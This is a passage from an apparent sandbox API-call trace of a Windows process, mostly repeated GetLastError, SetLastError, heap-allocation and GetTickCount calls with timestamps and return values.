(dwErrCode=0x0) [0040.433] GetLastError () returned 0x0 [0040.433] SetLastError (dwErrCode=0x0) [0040.433] GetLastError () returned 0x0 [0040.434] SetLastError (dwErrCode=0x0) [0040.434] GetLastError () returned 0x0 [0040.434] SetLastError (dwErrCode=0x0) [0040.434] GetLastError () returned 0x0 [0040.434] SetLastError (dwErrCode=0x0) [0040.434] GetLastError () returned 0x0 [0040.434] SetLastError (dwErrCode=0x0) [0040.434] GetLastError () returned 0x0 [0040.434] SetLastError (dwErrCode=0x0) [0040.434] GetLastError () returned 0x0 [0040.434] SetLastError (dwErrCode=0x0) [0040.434] GetLastError () returned 0x0 [0040.434] SetLastError (dwErrCode=0x0) [0040.434] GetLastError () returned 0x0 [0040.434] SetLastError (dwErrCode=0x0) [0040.434] GetLastError () returned 0x0 [0040.434] SetLastError (dwErrCode=0x0) [0040.434] GetLastError () returned 0x0 [0040.435] SetLastError (dwErrCode=0x0) [0040.435] GetLastError () returned 0x0 [0040.435] SetLastError (dwErrCode=0x0) [0040.435] GetLastError () returned 0x0 [0040.435] SetLastError (dwErrCode=0x0) [0040.435] GetLastError () returned 0x0 [0040.435] SetLastError (dwErrCode=0x0) [0040.435] GetLastError () returned 0x0 [0040.435] SetLastError (dwErrCode=0x0) [0040.435] GetLastError () returned 0x0 [0040.435] SetLastError (dwErrCode=0x0) [0040.435] GetLastError () returned 0x0 [0040.435] SetLastError (dwErrCode=0x0) [0040.435] GetLastError () returned 0x0 [0040.435] SetLastError (dwErrCode=0x0) [0040.435] GetLastError () returned 0x0 [0040.435] SetLastError (dwErrCode=0x0) [0040.436] GetLastError () returned 0x0 [0040.436] SetLastError (dwErrCode=0x0) [0040.436] GetLastError () returned 0x0 [0040.436] SetLastError (dwErrCode=0x0) [0040.436] GetLastError () returned 0x0 [0040.436] SetLastError (dwErrCode=0x0) [0040.436] GetLastError () returned 0x0 [0040.436] SetLastError (dwErrCode=0x0) [0040.436] GetLastError () returned 0x0 [0040.436] SetLastError (dwErrCode=0x0) [0040.436] GetLastError () returned 0x0 [0040.436] SetLastError (dwErrCode=0x0) [0040.436] GetLastError () returned 0x0 [0040.436] SetLastError (dwErrCode=0x0) [0040.436] GetLastError () returned 0x0 [0040.436] SetLastError (dwErrCode=0x0) [0040.436] GetLastError () returned 0x0 [0040.437] SetLastError (dwErrCode=0x0) [0040.437] GetLastError () returned 0x0 [0040.437] SetLastError (dwErrCode=0x0) [0040.437] GetLastError () returned 0x0 [0040.437] SetLastError (dwErrCode=0x0) [0040.437] GetLastError () returned 0x0 [0040.437] SetLastError (dwErrCode=0x0) [0040.437] GetLastError () returned 0x0 [0040.437] SetLastError (dwErrCode=0x0) [0040.437] GetLastError () returned 0x0 [0040.437] SetLastError (dwErrCode=0x0) [0040.437] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x0, Size=0x59) returned 0x3e1990 [0040.437] GetLastError () returned 0x0 [0040.437] SetLastError (dwErrCode=0x0) [0040.437] GetLastError () returned 0x0 [0040.437] SetLastError (dwErrCode=0x0) [0040.437] GetLastError () returned 0x0 [0040.437] SetLastError (dwErrCode=0x0) [0040.437] GetLastError () returned 0x0 [0040.438] SetLastError (dwErrCode=0x0) [0040.438] GetLastError () returned 0x0 [0040.438] SetLastError (dwErrCode=0x0) [0040.438] GetLastError () returned 0x0 [0040.438] SetLastError (dwErrCode=0x0) [0040.438] GetLastError () returned 0x0 [0040.438] SetLastError (dwErrCode=0x0) [0040.438] GetLastError () returned 0x0 [0040.438] SetLastError (dwErrCode=0x0) [0040.438] GetLastError () returned 0x0 [0040.438] SetLastError (dwErrCode=0x0) [0040.438] GetLastError () returned 0x0 [0040.438] SetLastError (dwErrCode=0x0) [0040.438] GetLastError () returned 0x0 [0040.438] SetLastError (dwErrCode=0x0) [0040.438] GetLastError () returned 0x0 [0040.438] SetLastError (dwErrCode=0x0) [0040.438] GetLastError () returned 0x0 [0040.439] SetLastError (dwErrCode=0x0) [0040.439] GetLastError () returned 0x0 [0040.439] SetLastError (dwErrCode=0x0) [0040.439] GetLastError () returned 0x0 [0040.439] SetLastError (dwErrCode=0x0) [0040.439] GetLastError () returned 0x0 [0040.439] SetLastError (dwErrCode=0x0) [0040.439] GetLastError () returned 0x0 [0040.439] SetLastError (dwErrCode=0x0) [0040.439] GetLastError () returned 0x0 [0040.439] SetLastError (dwErrCode=0x0) [0040.439] GetLastError () returned 0x0 [0040.439] SetLastError (dwErrCode=0x0) [0040.439] GetLastError () returned 0x0 [0040.439] SetLastError (dwErrCode=0x0) [0040.439] GetLastError () returned 0x0 [0040.439] SetLastError (dwErrCode=0x0) [0040.440] GetLastError () returned 0x0 [0040.440] SetLastError (dwErrCode=0x0) [0040.440] GetLastError () returned 0x0 [0040.440] SetLastError (dwErrCode=0x0) [0040.440] GetLastError () returned 0x0 [0040.440] SetLastError (dwErrCode=0x0) [0040.440] GetLastError () returned 0x0 [0040.440] SetLastError (dwErrCode=0x0) [0040.440] GetLastError () returned 0x0 [0040.440] SetLastError (dwErrCode=0x0) [0040.440] GetLastError () returned 0x0 [0040.440] SetLastError (dwErrCode=0x0) [0040.440] GetLastError () returned 0x0 [0040.440] SetLastError (dwErrCode=0x0) [0040.440] GetLastError () returned 0x0 [0040.440] SetLastError (dwErrCode=0x0) [0040.440] GetLastError () returned 0x0 [0040.441] SetLastError (dwErrCode=0x0) [0040.441] GetLastError () returned 0x0 [0040.441] SetLastError (dwErrCode=0x0) [0040.441] GetLastError () returned 0x0 [0040.441] SetLastError (dwErrCode=0x0) [0040.441] GetLastError () returned 0x0 [0040.441] SetLastError (dwErrCode=0x0) [0040.441] GetLastError () returned 0x0 [0040.441] SetLastError (dwErrCode=0x0) [0040.441] GetLastError () returned 0x0 [0040.441] SetLastError (dwErrCode=0x0) [0040.441] GetLastError () returned 0x0 [0040.441] SetLastError (dwErrCode=0x0) [0040.441] GetLastError () returned 0x0 [0040.441] SetLastError (dwErrCode=0x0) [0040.441] GetLastError () returned 0x0 [0040.441] SetLastError (dwErrCode=0x0) [0040.441] GetLastError () returned 0x0 [0040.442] SetLastError (dwErrCode=0x0) [0040.442] GetLastError () returned 0x0 [0040.442] SetLastError (dwErrCode=0x0) [0040.442] GetLastError () returned 0x0 [0040.442] SetLastError (dwErrCode=0x0) [0040.442] GetLastError () returned 0x0 [0040.442] SetLastError (dwErrCode=0x0) [0040.442] GetLastError () returned 0x0 [0040.442] SetLastError (dwErrCode=0x0) [0040.442] GetLastError () returned 0x0 [0040.442] SetLastError (dwErrCode=0x0) [0040.442] GetLastError () returned 0x0 [0040.442] SetLastError (dwErrCode=0x0) [0040.442] GetLastError () returned 0x0 [0040.442] SetLastError (dwErrCode=0x0) [0040.442] GetLastError () returned 0x0 [0040.442] SetLastError (dwErrCode=0x0) [0040.442] GetLastError () returned 0x0 [0040.443] SetLastError (dwErrCode=0x0) [0040.443] GetLastError () returned 0x0 [0040.443] SetLastError (dwErrCode=0x0) [0040.443] GetLastError () returned 0x0 [0040.443] SetLastError (dwErrCode=0x0) [0040.443] GetLastError () returned 0x0 [0040.443] SetLastError (dwErrCode=0x0) [0040.443] GetLastError () returned 0x0 [0040.443] SetLastError (dwErrCode=0x0) [0040.443] GetLastError () returned 0x0 [0040.443] SetLastError (dwErrCode=0x0) [0040.443] GetLastError () returned 0x0 [0040.444] SetLastError (dwErrCode=0x0) [0040.444] GetLastError () returned 0x0 [0040.444] SetLastError (dwErrCode=0x0) [0040.444] GetLastError () returned 0x0 [0040.444] SetLastError (dwErrCode=0x0) [0040.444] GetLastError () returned 0x0 [0040.444] SetLastError (dwErrCode=0x0) [0040.444] GetLastError () returned 0x0 [0040.444] SetLastError (dwErrCode=0x0) [0040.444] GetLastError () returned 0x0 [0040.444] SetLastError (dwErrCode=0x0) [0040.444] GetLastError () returned 0x0 [0040.444] SetLastError (dwErrCode=0x0) [0040.444] GetLastError () returned 0x0 [0040.444] SetLastError (dwErrCode=0x0) [0040.444] GetLastError () returned 0x0 [0040.444] SetLastError (dwErrCode=0x0) [0040.444] GetLastError () returned 0x0 [0040.445] SetLastError (dwErrCode=0x0) [0040.445] GetLastError () returned 0x0 [0040.445] SetLastError (dwErrCode=0x0) [0040.445] GetLastError () returned 0x0 [0040.445] SetLastError (dwErrCode=0x0) [0040.445] GetLastError () returned 0x0 [0040.445] SetLastError (dwErrCode=0x0) [0040.445] GetLastError () returned 0x0 [0040.445] SetLastError (dwErrCode=0x0) [0040.445] GetLastError () returned 0x0 [0040.445] SetLastError (dwErrCode=0x0) [0040.445] GetLastError () returned 0x0 [0040.445] SetLastError (dwErrCode=0x0) [0040.445] GetLastError () returned 0x0 [0040.445] SetLastError (dwErrCode=0x0) [0040.445] GetLastError () returned 0x0 [0040.445] SetLastError (dwErrCode=0x0) [0040.446] GetLastError () returned 0x0 [0040.446] SetLastError (dwErrCode=0x0) [0040.446] GetLastError () returned 0x0 [0040.446] SetLastError (dwErrCode=0x0) [0040.446] GetLastError () returned 0x0 [0040.446] SetLastError (dwErrCode=0x0) [0040.446] GetLastError () returned 0x0 [0040.446] SetLastError (dwErrCode=0x0) [0040.446] GetLastError () returned 0x0 [0040.446] SetLastError (dwErrCode=0x0) [0040.446] GetLastError () returned 0x0 [0040.446] SetLastError (dwErrCode=0x0) [0040.446] GetLastError () returned 0x0 [0040.446] SetLastError (dwErrCode=0x0) [0040.446] GetLastError () returned 0x0 [0040.446] SetLastError (dwErrCode=0x0) [0040.446] GetLastError () returned 0x0 [0040.447] SetLastError (dwErrCode=0x0) [0040.447] GetLastError () returned 0x0 [0040.447] SetLastError (dwErrCode=0x0) [0040.447] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x98) returned 0x3e19f8 [0040.447] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1f) returned 0x3e1a98 [0040.447] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x36) returned 0x3e1ac0 [0040.447] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x37) returned 0x3e1b00 [0040.447] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x3c) returned 0x3e1b40 [0040.447] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x31) returned 0x3e1b88 [0040.447] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x17) returned 0x3e1bc8 [0040.447] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x24) returned 0x3e1be8 [0040.447] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x14) returned 0x3e1c18 [0040.447] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xd) returned 0x3e1c38 [0040.447] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x25) returned 0x3e1c50 [0040.447] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x39) returned 0x3e1c80 [0040.447] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x18) returned 0x3e1cc8 [0040.447] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x17) returned 0x3e1ce8 [0040.447] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe) returned 0x3e1d08 [0040.447] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x69) returned 0x3e1d20 [0040.447] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x3e) returned 0x3e1d98 [0040.447] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1b) returned 0x3e1de0 [0040.447] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1d) returned 0x3e1e08 [0040.447] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x48) returned 0x3e1e30 [0040.447] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x12) returned 0x3e1e80 [0040.447] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x18) returned 0x3e1ea0 [0040.447] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1b) returned 0x3e1ec0 [0040.447] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x24) returned 0x3e1ee8 [0040.448] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x29) returned 0x3e1f18 [0040.448] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1e) returned 0x3e1f50 [0040.448] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x41) returned 0x3e1f78 [0040.448] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x17) returned 0x3e1fc8 [0040.448] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xf) returned 0x3e1fe8 [0040.448] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x16) returned 0x3e2000 [0040.448] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x2a) returned 0x3e2020 [0040.448] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x29) returned 0x3e2058 [0040.448] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x15) returned 0x3e2090 [0040.448] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1e) returned 0x3e20b0 [0040.448] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x2a) returned 0x3e20d8 [0040.448] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x12) returned 0x3e2110 [0040.448] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x18) returned 0x3e2130 [0040.448] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x46) returned 0x3e2150 [0040.448] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e11f8 | out: hHeap=0x3e0000) returned 1 [0040.448] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76e10000 [0040.448] GetProcAddress (hModule=0x76e10000, lpProcName="IsProcessorFeaturePresent") returned 0x76e25235 [0040.448] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0040.450] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x800) returned 0x3e21a0 [0040.450] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x80) returned 0x3e11f8 [0040.450] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4043b5) returned 0x0 [0040.451] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3e11f8) returned 0x80 [0040.451] GetLastError () returned 0x0 [0040.451] SetLastError (dwErrCode=0x0) [0040.451] GetLastError () returned 0x0 [0040.452] SetLastError (dwErrCode=0x0) [0040.452] GetLastError () returned 0x0 [0040.452] SetLastError (dwErrCode=0x0) [0040.452] GetLastError () returned 0x0 [0040.452] SetLastError (dwErrCode=0x0) [0040.452] GetLastError () returned 0x0 [0040.452] SetLastError (dwErrCode=0x0) [0040.452] GetLastError () returned 0x0 [0040.452] SetLastError (dwErrCode=0x0) [0040.452] GetLastError () returned 0x0 [0040.452] SetLastError (dwErrCode=0x0) [0040.452] GetLastError () returned 0x0 [0040.452] SetLastError (dwErrCode=0x0) [0040.452] GetLastError () returned 0x0 [0040.452] SetLastError (dwErrCode=0x0) [0040.452] GetLastError () returned 0x0 [0040.453] SetLastError (dwErrCode=0x0) [0040.453] GetLastError () returned 0x0 [0040.453] SetLastError (dwErrCode=0x0) [0040.453] GetLastError () returned 0x0 [0040.453] SetLastError (dwErrCode=0x0) [0040.453] GetLastError () returned 0x0 [0040.453] SetLastError (dwErrCode=0x0) [0040.453] GetLastError () returned 0x0 [0040.453] SetLastError (dwErrCode=0x0) [0040.453] GetLastError () returned 0x0 [0040.453] SetLastError (dwErrCode=0x0) [0040.453] GetLastError () returned 0x0 [0040.453] SetLastError (dwErrCode=0x0) [0040.453] GetLastError () returned 0x0 [0040.453] SetLastError (dwErrCode=0x0) [0040.453] GetLastError () returned 0x0 [0040.454] SetLastError (dwErrCode=0x0) [0040.454] GetLastError () returned 0x0 [0040.454] SetLastError (dwErrCode=0x0) [0040.454] GetLastError () returned 0x0 [0040.454] SetLastError (dwErrCode=0x0) [0040.454] GetLastError () returned 0x0 [0040.454] SetLastError (dwErrCode=0x0) [0040.454] GetLastError () returned 0x0 [0040.454] SetLastError (dwErrCode=0x0) [0040.454] GetLastError () returned 0x0 [0040.454] SetLastError (dwErrCode=0x0) [0040.454] GetLastError () returned 0x0 [0040.454] SetLastError (dwErrCode=0x0) [0040.454] GetLastError () returned 0x0 [0040.454] SetLastError (dwErrCode=0x0) [0040.454] GetLastError () returned 0x0 [0040.454] SetLastError (dwErrCode=0x0) [0040.454] GetLastError () returned 0x0 [0040.455] SetLastError (dwErrCode=0x0) [0040.455] GetLastError () returned 0x0 [0040.455] SetLastError (dwErrCode=0x0) [0040.455] GetLastError () returned 0x0 [0040.455] SetLastError (dwErrCode=0x0) [0040.455] GetLastError () returned 0x0 [0040.455] SetLastError (dwErrCode=0x0) [0040.455] GetLastError () returned 0x0 [0040.455] SetLastError (dwErrCode=0x0) [0040.455] GetLastError () returned 0x0 [0040.455] SetLastError (dwErrCode=0x0) [0040.455] GetLastError () returned 0x0 [0040.455] SetLastError (dwErrCode=0x0) [0040.455] GetLastError () returned 0x0 [0040.455] SetLastError (dwErrCode=0x0) [0040.455] GetLastError () returned 0x0 [0040.456] SetLastError (dwErrCode=0x0) [0040.456] GetLastError () returned 0x0 [0040.456] SetLastError (dwErrCode=0x0) [0040.456] GetLastError () returned 0x0 [0040.456] SetLastError (dwErrCode=0x0) [0040.456] GetLastError () returned 0x0 [0040.456] SetLastError (dwErrCode=0x0) [0040.456] GetLastError () returned 0x0 [0040.456] SetLastError (dwErrCode=0x0) [0040.456] GetLastError () returned 0x0 [0040.456] SetLastError (dwErrCode=0x0) [0040.456] GetLastError () returned 0x0 [0040.456] SetLastError (dwErrCode=0x0) [0040.456] GetLastError () returned 0x0 [0040.456] SetLastError (dwErrCode=0x0) [0040.456] GetLastError () returned 0x0 [0040.456] SetLastError (dwErrCode=0x0) [0040.457] GetLastError () returned 0x0 [0040.457] SetLastError (dwErrCode=0x0) [0040.457] GetLastError () returned 0x0 [0040.457] SetLastError (dwErrCode=0x0) [0040.457] GetLastError () returned 0x0 [0040.457] SetLastError (dwErrCode=0x0) [0040.457] GetLastError () returned 0x0 [0040.457] SetLastError (dwErrCode=0x0) [0040.457] GetLastError () returned 0x0 [0040.457] SetLastError (dwErrCode=0x0) [0040.457] GetLastError () returned 0x0 [0040.457] SetLastError (dwErrCode=0x0) [0040.457] GetLastError () returned 0x0 [0040.457] SetLastError (dwErrCode=0x0) [0040.457] GetLastError () returned 0x0 [0040.457] SetLastError (dwErrCode=0x0) [0040.457] GetLastError () returned 0x0 [0040.458] SetLastError (dwErrCode=0x0) [0040.458] GetLastError () returned 0x0 [0040.458] SetLastError (dwErrCode=0x0) [0040.458] GetLastError () returned 0x0 [0040.458] SetLastError (dwErrCode=0x0) [0040.458] GetLastError () returned 0x0 [0040.458] SetLastError (dwErrCode=0x0) [0040.458] GetLastError () returned 0x0 [0040.458] SetLastError (dwErrCode=0x0) [0040.458] GetLastError () returned 0x0 [0040.458] SetLastError (dwErrCode=0x0) [0040.458] GetLastError () returned 0x0 [0040.458] SetLastError (dwErrCode=0x0) [0040.458] GetLastError () returned 0x0 [0040.458] SetLastError (dwErrCode=0x0) [0040.458] GetLastError () returned 0x0 [0040.469] SetLastError (dwErrCode=0x0) [0040.469] GetLastError () returned 0x0 [0040.469] SetLastError (dwErrCode=0x0) [0040.469] GetLastError () returned 0x0 [0040.469] SetLastError (dwErrCode=0x0) [0040.469] GetLastError () returned 0x0 [0040.469] SetLastError (dwErrCode=0x0) [0040.469] GetLastError () returned 0x0 [0040.469] SetLastError (dwErrCode=0x0) [0040.469] GetLastError () returned 0x0 [0040.469] SetLastError (dwErrCode=0x0) [0040.469] GetLastError () returned 0x0 [0040.470] lstrlenA (lpString="") returned 0 [0040.470] GetTickCount () returned 0x1155523 [0040.470] GetLastError () returned 0x0 [0040.470] GetTickCount () returned 0x1155523 [0040.470] GetLastError () returned 0x0 [0040.470] GetTickCount () returned 0x1155523 [0040.470] GetLastError () returned 0x0 [0040.470] GetTickCount () returned 0x1155523 [0040.470] GetLastError () returned 0x0 [0040.470] GetTickCount () returned 0x1155523 [0040.470] GetLastError () returned 0x0 [0040.470] GetTickCount () returned 0x1155523 [0040.470] GetLastError () returned 0x0 [0040.470] GetTickCount () returned 0x1155523 [0040.470] GetLastError () returned 0x0 [0040.470] GetTickCount () returned 0x1155523 [0040.470] GetLastError () returned 0x0 [0040.470] GetTickCount () returned 0x1155523 [0040.470] GetLastError () returned 0x0 [0040.470] GetTickCount () returned 0x1155523 [0040.470] GetLastError () returned 0x0 [0040.470] GetTickCount () returned 0x1155523 [0040.470] GetLastError () returned 0x0 [0040.470] GetTickCount () returned 0x1155523 [0040.470] GetLastError () returned 0x0 [0040.470] GetTickCount () returned 0x1155523 [0040.470] GetLastError () returned 0x0 [0040.471] GetTickCount () returned 0x1155523 [0040.471] GetLastError () returned 0x0 [0040.471] GetTickCount () returned 0x1155523 [0040.471] GetLastError () returned 0x0 [0040.471] GetTickCount () returned 0x1155523 [0040.471] GetLastError () returned 0x0 [0040.471] GetTickCount () returned 0x1155523 [0040.471] GetLastError () returned 0x0 [0040.471] GetTickCount () returned 0x1155523 [0040.471] GetLastError () returned 0x0 [0040.471] GetTickCount () returned 0x1155523 [0040.471] GetLastError () returned 0x0 [0040.471] GetTickCount () returned 0x1155523 [0040.471] GetLastError () returned 0x0 [0040.471] GetTickCount () returned 0x1155523 [0040.471] GetLastError () returned 0x0 [0040.471] GetTickCount () returned 0x1155523 [0040.471] GetLastError () returned 0x0 [0040.471] GetTickCount () returned 0x1155523 [0040.471] GetLastError () returned 0x0 [0040.471] GetTickCount () returned 0x1155523 [0040.471] GetLastError () returned 0x0 [0040.471] GetTickCount () returned 0x1155523 [0040.471] GetLastError () returned 0x0 [0040.471] GetTickCount () returned 0x1155523 [0040.471] GetLastError () returned 0x0 [0040.471] GetTickCount () returned 0x1155523 [0040.471] GetLastError () returned 0x0 [0040.471] GetTickCount () returned 0x1155523 [0040.471] GetLastError () returned 0x0 [0040.472] GetTickCount () returned 0x1155523 [0040.472] GetLastError () returned 0x0 [0040.472] GetTickCount () returned 0x1155523 [0040.472] GetLastError () returned 0x0 [0040.472] GetTickCount () returned 0x1155523 [0040.472] GetLastError () returned 0x0 [0040.472] GetTickCount () returned 0x1155523 [0040.472] GetLastError () returned 0x0 [0040.472] GetTickCount () returned 0x1155523 [0040.472] GetLastError () returned 0x0 [0040.472] GetTickCount () returned 0x1155523 [0040.472] GetLastError () returned 0x0 [0040.472] GetTickCount () returned 0x1155523 [0040.472] GetLastError () returned 0x0 [0040.472] GetTickCount () returned 0x1155523 [0040.472] GetLastError () returned 0x0 [0040.472] GetTickCount () returned 0x1155523 [0040.472] GetLastError () returned 0x0 [0040.472] GetTickCount () returned 0x1155523 [0040.472] GetLastError () returned 0x0 [0040.472] GetTickCount () returned 0x1155523 [0040.472] GetLastError () returned 0x0 [0040.472] GetTickCount () returned 0x1155523 [0040.472] GetLastError () returned 0x0 [0040.472] GetTickCount () returned 0x1155523 [0040.472] GetLastError () returned 0x0 [0040.472] GetTickCount () returned 0x1155523 [0040.472] GetLastError () returned 0x0 [0040.472] GetTickCount () returned 0x1155523 [0040.472] GetLastError () returned 0x0 [0040.472] GetTickCount () returned 0x1155523 [0040.473] GetLastError () returned 0x0 [0040.473] GetTickCount () returned 0x1155523 [0040.473] GetLastError () returned 0x0 [0040.473] GetTickCount () returned 0x1155523 [0040.473] GetLastError () returned 0x0 [0040.473] GetTickCount () returned 0x1155523 [0040.473] GetLastError () returned 0x0 [0040.473] GetTickCount () returned 0x1155523 [0040.473] GetLastError () returned 0x0 [0040.473] GetTickCount () returned 0x1155523 [0040.473] GetLastError () returned 0x0 [0040.473] GetTickCount () returned 0x1155523 [0040.473] GetLastError () returned 0x0 [0040.473] GetTickCount () returned 0x1155523 [0040.473] GetLastError () returned 0x0 [0040.473] GetTickCount () returned 0x1155523 [0040.473] GetLastError () returned 0x0 [0040.473] GetTickCount () returned 0x1155523 [0040.473] GetLastError () returned 0x0 [0040.473] GetTickCount () returned 0x1155523 [0040.473] GetLastError () returned 0x0 [0040.473] GetTickCount () returned 0x1155523 [0040.473] GetLastError () returned 0x0 [0040.473] GetTickCount () returned 0x1155523 [0040.473] GetLastError () returned 0x0 [0040.473] GetTickCount () returned 0x1155523 [0040.473] GetLastError () returned 0x0 [0040.473] GetTickCount () returned 0x1155523 [0040.473] GetLastError () returned 0x0 [0040.473] GetTickCount () returned 0x1155523 [0040.474] GetLastError () returned 0x0 [0040.474] GetTickCount () returned 0x1155523 [0040.474] GetLastError () returned 0x0 [0040.474] GetTickCount () returned 0x1155523 [0040.474] GetLastError () returned 0x0 [0040.474] GetTickCount () returned 0x1155523 [0040.474] GetLastError () returned 0x0 [0040.474] GetTickCount () returned 0x1155523 [0040.474] GetLastError () returned 0x0 [0040.474] GetTickCount () returned 0x1155523 [0040.474] GetLastError () returned 0x0 [0040.474] GetTickCount () returned 0x1155523 [0040.474] GetLastError () returned 0x0 [0040.474] GetTickCount () returned 0x1155532 [0040.474] GetLastError () returned 0x0 [0040.474] GetTickCount () returned 0x1155532 [0040.474] GetLastError () returned 0x0 [0040.474] GetTickCount () returned 0x1155532 [0040.474] GetLastError () returned 0x0 [0040.474] GetTickCount () returned 0x1155532 [0040.474] GetLastError () returned 0x0 [0040.474] GetTickCount () returned 0x1155532 [0040.475] GetLastError () returned 0x0 [0040.475] GetTickCount () returned 0x1155532 [0040.475] GetLastError () returned 0x0 [0040.475] GetTickCount () returned 0x1155532 [0040.475] GetLastError () returned 0x0 [0040.475] GetTickCount () returned 0x1155532 [0040.475] GetLastError () returned 0x0 [0040.475] GetTickCount () returned 0x1155532 [0040.475] GetLastError () returned 0x0 [0040.475] GetTickCount () returned 0x1155532 [0040.475] GetLastError () returned 0x0 [0040.475] GetTickCount () returned 0x1155532 [0040.475] GetLastError () returned 0x0 [0040.475] GetTickCount () returned 0x1155532 [0040.475] GetLastError () returned 0x0 [0040.475] GetTickCount () returned 0x1155532 [0040.475] GetLastError () returned 0x0 [0040.475] GetTickCount () returned 0x1155532 [0040.475] GetLastError () returned 0x0 [0040.475] GetTickCount () returned 0x1155532 [0040.475] GetLastError () returned 0x0 [0040.475] GetTickCount () returned 0x1155532 [0040.475] GetLastError () returned 0x0 [0040.475] GetTickCount () returned 0x1155532 [0040.475] GetLastError () returned 0x0 [0040.475] GetTickCount () returned 0x1155532 [0040.475] GetLastError () returned 0x0 [0040.475] GetTickCount () returned 0x1155532 [0040.475] GetLastError () returned 0x0 [0040.475] GetTickCount () returned 0x1155532 [0040.476] GetLastError () returned 0x0 [0040.476] GetTickCount () returned 0x1155532 [0040.476] GetLastError () returned 0x0 [0040.476] GetTickCount () returned 0x1155532 [0040.476] GetLastError () returned 0x0 [0040.476] GetTickCount () returned 0x1155532 [0040.476] GetLastError () returned 0x0 [0040.476] GetTickCount () returned 0x1155532 [0040.476] GetLastError () returned 0x0 [0040.476] GetTickCount () returned 0x1155532 [0040.476] GetLastError () returned 0x0 [0040.476] GetTickCount () returned 0x1155532 [0040.476] GetLastError () returned 0x0 [0040.476] GetTickCount () returned 0x1155532 [0040.476] GetLastError () returned 0x0 [0040.476] GetTickCount () returned 0x1155532 [0040.476] GetLastError () returned 0x0 [0040.476] GetTickCount () returned 0x1155532 [0040.476] GetLastError () returned 0x0 [0040.476] GetTickCount () returned 0x1155532 [0040.476] GetLastError () returned 0x0 [0040.476] GetTickCount () returned 0x1155532 [0040.476] GetLastError () returned 0x0 [0040.476] GetTickCount () returned 0x1155532 [0040.476] GetLastError () returned 0x0 [0040.476] GetTickCount () returned 0x1155532 [0040.476] GetLastError () returned 0x0 [0040.476] GetTickCount () returned 0x1155532 [0040.476] GetLastError () returned 0x0 [0040.476] GetTickCount () returned 0x1155532 [0040.477] GetLastError () returned 0x0 [0040.477] GetTickCount () returned 0x1155532 [0040.477] GetLastError () returned 0x0 [0040.477] GetTickCount () returned 0x1155532 [0040.477] GetLastError () returned 0x0 [0040.477] GetTickCount () returned 0x1155532 [0040.477] GetLastError () returned 0x0 [0040.477] GetTickCount () returned 0x1155532 [0040.477] GetLastError () returned 0x0 [0040.477] GetTickCount () returned 0x1155532 [0040.477] GetLastError () returned 0x0 [0040.477] GetTickCount () returned 0x1155532 [0040.477] GetLastError () returned 0x0 [0040.477] GetTickCount () returned 0x1155532 [0040.477] GetLastError () returned 0x0 [0040.477] GetTickCount () returned 0x1155532 [0040.477] GetLastError () returned 0x0 [0040.477] GetTickCount () returned 0x1155532 [0040.477] GetLastError () returned 0x0 [0040.477] GetTickCount () returned 0x1155532 [0040.477] GetLastError () returned 0x0 [0040.477] GetTickCount () returned 0x1155532 [0040.477] GetLastError () returned 0x0 [0040.477] GetTickCount () returned 0x1155532 [0040.477] GetLastError () returned 0x0 [0040.477] GetTickCount () returned 0x1155532 [0040.477] GetLastError () returned 0x0 [0040.477] GetTickCount () returned 0x1155532 [0040.477] GetLastError () returned 0x0 [0040.477] GetTickCount () returned 0x1155532 [0040.477] GetLastError () returned 0x0 [0040.478] GetTickCount () returned 0x1155532 [0040.478] GetLastError () returned 0x0 [0040.478] 